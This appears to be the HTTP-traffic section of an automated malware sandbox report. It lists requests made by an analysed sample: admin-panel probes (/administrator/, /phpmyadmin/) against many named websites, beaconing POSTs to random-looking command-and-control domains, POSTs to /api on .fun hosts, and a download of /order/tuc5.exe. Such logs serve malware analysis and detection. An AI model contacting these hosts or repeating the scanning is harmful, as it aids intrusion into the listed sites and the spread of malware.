                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: predan.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: predan.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eurokamen.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: sport-tour.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: sport-tour.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: izberatel.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: izberatel.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: keramat.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: aexoden.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ericrothphoto.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: elrocket.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: aexoden.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=hokal.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=hokal.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=hokal.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: aexoden.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /eshop HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /eshop HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: nakacho.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://enporysqhiukeibs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: sumagulituyo.org
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ufwenaivgdjepo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: snukerukeutit.org
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ycpdbybbbnmbopuu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: lightseinsteniki.org
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://heyhupmlghsc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: liuliuoumumy.org
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tarasyawpmbceaue.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mhdlwjmpxebgw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://olpanyjjmlmqs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nkctepaugsprcr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bjeuijowqdo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mihudybqjipixxx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cmfoounwccmmbeiv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ldanpoxjpoalqm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://upmgduvgcaynbief.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dmaxngmayussxg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vspcmqwtpie.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qacoxurikdg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xkgbwxrauuf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: bombertublestylebanws.fun
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: neighborhoodfeelsa.fun
                                Source: global trafficHTTP traffic detected: GET /ftp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ftpvoyager.cc
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: diagramfiremonkeyowwa.fun
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=4Eqmux7qWYqWF5T9EAcIlgBVYAxQEOhYEz9MGlD6Xk0-1703131363-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 79Host: diagramfiremonkeyowwa.fun
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xpqsjpwxwnap.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://makqeitijnm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tspehlymgqit.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fxhvtwuypcw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: GET /order/tuc5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cream.hitsturbo.com
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ageiqalogaupa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sbvtimrcbnumaj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ajtligjreiecnee.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://stualialuyastrelia.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 4431Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wsrxxlaeilhke.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: humydrole.com
                                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hsobffrvmnsfd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: humydrole.com
                                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tudkvhlcrmwxulqv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: humydrole.com
                                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hwltvbnrfeycxra.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: humydrole.com
                                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rtgfdegyifa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: humydrole.com
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: inhodinky.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: elossa.deAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: elossa.deAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: aexoden.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: elossa.deAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://elossa.de/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: elossa.deAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://elossa.de/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: aexoden.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: e-art-studio.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: e-art-studio.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://e-art-studio.co.jp/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: izberatel.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: izberatel.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eurisproagro.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eurokamen.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eurokamen.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: aloeveraforever.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: detmar.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: aloeveraforever.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: eurisproagro.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://eurisproagro.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://abatek.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://abatek.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://abatek.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://eshopy-katalog.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://abatek.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://eshopy-katalog.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: aloeveraforever.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://aloeveraforever.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: aloeveraforever.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://aloeveraforever.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://eshopy-katalog.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: keramat.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: enso-center.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: enso-center.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ericrothphoto.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: aexoden.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: tsutomu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: elteconline.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: elrocket.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
